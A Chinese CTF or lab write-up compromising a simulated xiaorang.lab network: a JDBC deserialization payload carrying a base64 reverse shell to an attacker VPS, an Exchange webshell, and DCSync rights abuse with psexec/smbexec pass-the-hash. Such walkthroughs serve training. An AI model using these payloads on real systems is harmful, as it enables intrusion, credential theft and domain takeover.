全端口扫一手

没什么可利用的服务，还是看看远处的80和8000吧

8000端口lumia ERP弱口令admin:123456即可登录

进去后右上角点了一下官方插件跳转到了华夏ERP，于是去找一下华夏ERP相关的洞

没找到很好的后台rce之类的洞，看了一眼提示去搜了一下JDBC，然后就一眼丁真

成功找到了大哥文章

公网起个恶意mysql --> https://github.com/fnmsd/MySQL_Fake_Server

config.json(ysoserial-all.jar来自https://github.com/frohoff/ysoserial)

{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections6":["CommonCollections6","bash -c {echo,YmFzaCA.....zMzIDA+JjE=}|{base64,-d}|{bash,-i}"]
    }
}

exp:

{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "VPS-IP", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAta......zMzIDA+JjE=}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }

bp直接发包，注意要url编码下

成功getshell，还是root权限

先上线到viper，方便后续操作，顺便看一下flag

看下网卡

eth0      Link encap:Ethernet  HWaddr 00:16:3e:23:0c:59  
          inet addr:172.22.3.12  Bcast:172.22.255.255  Mask:255.255.0.0
          inet6 addr: fe80::216:3eff:fe23:c59/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:450985 errors:0 dropped:0 overruns:0 frame:0
          TX packets:369352 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:162374033 (162.3 MB)  TX bytes:32947225 (32.9 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:8148 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8148 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1608086 (1.6 MB)  TX bytes:1608086 (1.6 MB)

然后传fscan扫下C段，顺便viper做个代理

shell ./fscan -h 172.22.3.0/24

结果如下

meterpreter > shell -c './fscan -h 172.22.3.0/24'

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.26     is alive
[*] Icmp alive hosts len is: 4
172.22.3.12:22 open
172.22.3.9:8172 open
172.22.3.26:445 open
172.22.3.2:445 open
172.22.3.9:445 open
172.22.3.26:139 open
172.22.3.9:443 open
172.22.3.2:139 open
172.22.3.9:139 open
172.22.3.26:135 open
172.22.3.2:135 open
172.22.3.9:135 open
172.22.3.9:81 open
172.22.3.12:8000 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.2:88 open
172.22.3.9:808 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo:
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] NetInfo:
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] WebTitle: http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle: http://172.22.3.12        code:200 len:19813  title:lumia
[*] NetBios: 172.22.3.2      [+]DC XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] NetBios: 172.22.3.26     XIAORANG\XIAORANG-PC           
[*] NetBios: 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         cWindows Server 2016 Datacenter 14393 
[*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle: http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle: https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook

简单分析下，又是经典的四台机器

172.22.3.12     拿下
172.22.3.9      域内机器
172.22.3.2      域控
172.22.3.26     域内机器

172.22.3.9 上面有个outlook，先看看

exp直接打,猜一手邮件后缀是xiaorang.lab

admin@xiaorang.lab没打通，administrator@xiaorang.lab打通了

p4 python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

成功写入shell

执行命令的命令如下

curl --request POST --url https://172.22.3.9/owa/auth/llmuo.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k

加个代理再执行成功rce

然后直接msf生成powershell一句话上线先上线下，然后读flag

直接进去抓一下hash

抓到了域内用户zhangtong的hash和当前的system账户的hash

BloodHound 简单分析一手发现exchange这台机器上的域用户有writeDacl权限，也就是zhangtong

给他加上dcsync权限

p4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes : -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

然后psexec直接进域控机器

p4 python3 psexec.py administrator@172.22.3.2-hashes :7acbc9a6cOefd81bfa7d5a1d4238beb -codec gbk

拿到flag4

还剩一个flag，应该在26那台机器上

直接smbexec横向过去

p4 python3 smbexec.py -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -codec gbk

admin里面没东西

lumia的桌面上有一个secret.zip，搞花活是吧

要断网了，直接翻看wp

拿到压缩包后会发现有密码，然后这个lumia有几个邮件，提示了密码是手机号，并且给出了一堆手机号，爆破一下就好力，拿到flag3

赢!

结束(